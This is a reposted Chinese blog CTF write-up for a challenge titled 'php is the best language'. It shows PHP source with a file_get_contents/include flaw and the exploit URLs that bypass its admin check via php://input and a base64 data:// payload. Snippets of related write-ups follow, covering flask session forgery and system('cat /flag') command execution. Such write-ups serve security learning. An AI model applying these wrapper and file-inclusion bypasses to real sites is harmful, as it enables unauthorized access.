[CTF]No.0002 莫桑比克-php是最好的语言(待完善)

最新推荐文章于 2025-06-01 20:11:59 发布
转载 最新推荐文章于 2025-06-01 20:11:59 发布 · 1.6k 阅读 · 0
文章标签:

#CTF #PHP伪协议

本文介绍了一种利用PHP伪协议和data协议进行Web应用渗透的方法。通过构造特定的URL请求,绕过权限验证并获取后台敏感信息。文章详细展示了如何设置参数以触发包含文件的功能,并最终找到隐藏的flag。

莫桑比克-php是最好的语言

来源:HBCTF第一场WP
类别:php伪协议、data协议
来源:http://www.moonsos.com/post/256.html
用到工具:HxD(16进制编辑器) 或 winhex
     WINRAR 或 好压 (查看 CRC32)

题目地址:http://123.206.66.106(已失效)

右击查看源码

you are not admin ! 
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 -->

方法一:

先要加入user参数,而且要满足最后得到的user参数结果为 “the user is admin”,可以利用php伪协议:

http://123.206.66.106/index.php?user=php://input

同时利用Hackbar(一个火狐插件)发送post数据为

the user is admin

方法二:

也可以利用data协议:

http://123.206.66.106/?user=data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=
dGhlIHVzZXIgaXMgYWRtaW4= base64解码后为the user is admin

得到如图界面:

查看源码得到flag

参考

file_get_contents()
php://
data://

原文:米安网

[BUUCTF][HCTF 2018]admin
cosmoslin的博客
11-16 1360
考点 flask session伪造 unicode欺骗 条件竞争 法一:flask session伪造 查看源码,提示you are not admin,猜测需要admin登录 注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码 是一个flask框架,进入routes.py,看一下注册和登录部分的源码 @app.route('/register', methods = ['GET', 'POST']) def register(): if current_
BUUCTF [HCTF 2018] admin
Senimo
12-10 1428
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 598
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
polarctf靶场【web】PHP是世界上最好语言、反序列化、BlackMagic、再来ping一波啊、找找shell
m0_73981089的博客
04-24 1783
polarctf
php是世界上最好语言 ctf+代码审计+加密函数绕过
NLost
02-26 4684
前端攻城狮跑路了,不过PHP最好语言 ?? 还是直接审计代码吧 <?php show_source(__FILE__); @include_once 'flag.php'; //前端攻城狮跑路了,不过PHP最好语言 $a = $_GET['a']; $b = $_GET['b']; $good = false; if (sha1($a)===sha1($b)) { $good = true; } else die('bypas
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-bugku-crypto-[easy_crypto]-摩斯密码
m0_43405474的博客
03-03 4353
CTF-bugku-crypto-[easy_crypto]-摩斯密码1.题目信息2.思路3.解题3.1格式转化3.2 解密4.flag 1.题目信息 2.思路 基于摩斯密码的二值特性,考虑这一串字符是摩斯密码的变体。 3.解题 3.1格式转化 用脚本将密文字符串转化为摩斯密码的标准格式,’/'作为分割符。 c='0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1
【网络安全】ctf实战-ctf.show-vip题目限免
weixin_65311462的博客
08-28 1804
2. 得到set-cookie:flag=ctfshow%7B29db2c06-7471-4f20-bcfb-4bff9c68a879%7D,明显被加密过了,用hackbar url解密(Encode),.3.得到提示信息,//flag in fl000g.txt flag{flag_here}->拼接flag{flag_here},不成?得出flag=ctfshow ctfshow{bd36ef96-1c5e-4b4e-aba9-7af9ecdba24e}
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
ctf.show-web赛题】
一纸荒芜的博客
03-21 3733
主要分享自己做题的心得和积累,共勉之。
网鼎杯-第三场-逆向-最好语言
08-28
2018年8月27日 网鼎杯|第三场|逆向------最好语言~~~
php最好语言 ctf,CTF-Web-[极客大挑战 2019]PHP
weixin_35812582的博客
03-11 676
CTF-Web-[极客大挑战 2019]PHP博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址题目Web类,[极客大挑战 2019]PHP打开题目的实例思路看到这种题目,我爱了特别是这个动画效果,做安全的前端也这么优秀吗?大佬不过我发下一个问题,这个动画搞的我打不开源代码了,我...
php是世界上最好语言
优派编程
02-24 564
点击上方蓝字"优派编程"选择“加为星标”,第一时间关注原创干货最近在自己看的视频自学php,没参加过培训班。可能学习强度没有培训班这么高!学会了可以自己开发网站。自己写一个...
polar ctf靶场web之PHP是世界上最好语言
2301_82086776的博客
06-01 525
但是由于.会被过滤了,无法正常读取flag.php了,所以使用sys=echo $flag直接输出flag这个变量。_POST[flag1]=8gen1&_POST[flag2]=8gen1,不但绕过第一个if语句,而且还满足第二if语句。和$GLOBALS['flag2']=8gen1参数,这可能不是必要的,并且可能引入额外的复杂性。当flag1和flag2均为'8gen1',且存在504_SYS.COM参数时,检查$c的内容。和$GLOBALS['flag2'],等价于$flag1和$flag2。
听说 php是世界上最好语言
qq_43392665的博客
12-31 1348
// STEP_ONE.html &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt; ======== &lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;center&gt; &lt;br&gt; &lt;br&gt; &am
PHP是世界上最好语言
拥抱AI的老粽子
11-23 862
早年间,要想让一个社区沸腾起来,你只要抛出这样一句话『PHP是世界上最好语言』,各个语言的鄙视链就开始了。 曾经有资深的PHPer说:能够用PHP解决所有问题; 佛系的说法是:语言无分好坏,要看实际的需要; 架构师的说法是:PHP适合做WEB应用,你的系统应该这样架构:PHP做业务展示层,Java做接口层,如果可以用C做底层; PHP不断在改善自己一直被诟病的性能问题,如今的PHP7性能...
地球上最好语言
Programming & Art
09-02 2112
没有什么语言比另外一种语言更好,更重要。目前地球上的多数语言都有其替代品。 做架构设计的时候,应该综合考虑不同语言的优势劣势,以更有效的解决问题为目标。这里说的有效包括执行效率和开发效率。 复杂的项目,从语言的使用上来说,通常都是多层的。例如,底层考虑效率可能会用C/C++,甚至夹杂一些汇编,中间层则会使用一种开发效率较高的OO语言,如果考虑可配置性,最上层如果需要的话还会使用更灵活的
刷题记录【LitCTFPHP是世界上最好语言!!
qq_74414939的博客
05-18 581
我们可以在右边输入PHP代码,页面会进行执行。根据初始页面的提示,flag应该是一个文件,并且位于根目录。于是先猜测程序没有对命令执行进行过滤,可能存在命令执行漏洞。于是输入system(“cat /flag”);尝试直接获取flag,结果直接成功。进入题目,首先映入眼帘的是这样的页面。于是打开链接一探究竟。进入之后是这样的页面。
Litctf——PHP是世界上最好语言!!
m0_74093152的博客
05-21 464
(cat后面有个空格,这个意思是打开根目录下的flag,如果不在根目录下,不需要加/)命令执行漏洞,直接执行system("cat /flag");题目提示flag位于根目录。
.... - --. .. .-. . .-. .- ..- --- -.-- --. .- .-.. ..-. -- .- ..
最新发布
06-12
### CTF摩尔斯电码解题方法及工具 在CTF竞赛中,摩尔斯电码是一种常见的密码学题目类型。以下内容将详细介绍如何解密摩尔斯电码并提交FLAG。 #### 1. 摩尔斯电码基础 摩尔斯电码由点(·)和划(-)组成,用于传递信息的编码系统。每个字母、数字和标点符号都有对应的摩尔斯电码表示形式[^1]。例如,字母A的摩尔斯电码为`.-`,数字1为`.----`。字母之间通过短停顿分隔,单词之间用较长停顿分隔。 #### 2. 解码工具 解码摩尔斯电码可以使用多种工具和方法。以下是常用的工具: - **在线解码器**:许多网站提供摩尔斯电码的在线解码功能。用户只需输入摩尔斯电码字符串,即可获得解码后的明文。 - **Python脚本**:编写自定义脚本实现摩尔斯电码的解码。以下是一个简单的Python示例代码: ```python morse_code_dict = { '.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F', '--.': 'G', '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L', '--': 'M', '-.': 'N', '---': 'O', '.--.': 'P', '--.-': 'Q', '.-.': 'R', '...': 'S', '-': 'T', '..-': 'U', '...-': 'V', '.--': 'W', '-..-': 'X', '-.--': 'Y', '--..': 'Z', '-----': '0', '.----': '1', '..---': '2', '...--': '3', '....-': '4', '.....': '5', '-....': '6', '--...': '7', '---..': '8', '----.': '9' } def decode_morse(morse_code): morse_code = morse_code.strip().split(' ') decoded_message = ''.join([morse_code_dict[char] if char in morse_code_dict else '' for char in morse_code]) return decoded_message # 示例输入 morse_code = ".... . .-.. .--. ... ---" decoded_message = decode_morse(morse_code) print(decoded_message) # 输出: HELPSO ``` #### 3. 音频隐写分析 在某些CTF题目中,摩尔斯电码可能隐藏在音频文件中。此时需要借助音频处理工具进行分析[^2]。常用工具包括: - **Audacity**:开源音频处理软件,支持分析音频的频谱和波形。 - **MP3Stego**:专门用于音频数据分析和隐写检测的工具。 #### 4. 提交FLAG 解码完成后,通常需要将结果以特定格式提交至CTF平台。大多数情况下,FLAG格式为`flag{}`或`ctf{}`,具体格式需根据题目要求确定。 #### 5. 实战靶场推荐 为了提升解题能力,可以尝试以下CTF实战靶场[^3]: - **CTFTime**:全球CTF比赛信息汇总平台。 - **HackTheBox**:提供真实环境下的渗透测试练习。 - **OverTheWire**:专注于各种类型的CTF挑战。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值